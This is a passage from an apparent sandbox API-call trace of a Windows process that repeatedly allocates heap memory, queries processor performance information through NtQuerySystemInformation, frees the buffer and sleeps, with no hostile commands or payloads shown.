dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.208] Sleep (dwMilliseconds=0x110) [0222.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.220] Sleep (dwMilliseconds=0x110) [0222.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.235] Sleep (dwMilliseconds=0x110) [0222.337] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.337] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.338] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.338] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.338] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.339] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.339] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.340] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.342] Sleep (dwMilliseconds=0x110) [0222.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.493] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.495] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.495] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.495] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.496] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.496] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.496] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.496] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.498] Sleep (dwMilliseconds=0x110) [0222.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.520] Sleep (dwMilliseconds=0x110) [0222.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.565] Sleep (dwMilliseconds=0x110) [0222.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.585] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.591] Sleep (dwMilliseconds=0x110) [0222.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.615] Sleep (dwMilliseconds=0x110) [0222.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.635] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.636] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.636] Sleep (dwMilliseconds=0x110) [0222.637] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.637] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.640] Sleep (dwMilliseconds=0x110) [0222.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.659] Sleep (dwMilliseconds=0x110) [0222.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.673] Sleep (dwMilliseconds=0x110) [0222.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.702] Sleep (dwMilliseconds=0x110) [0222.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 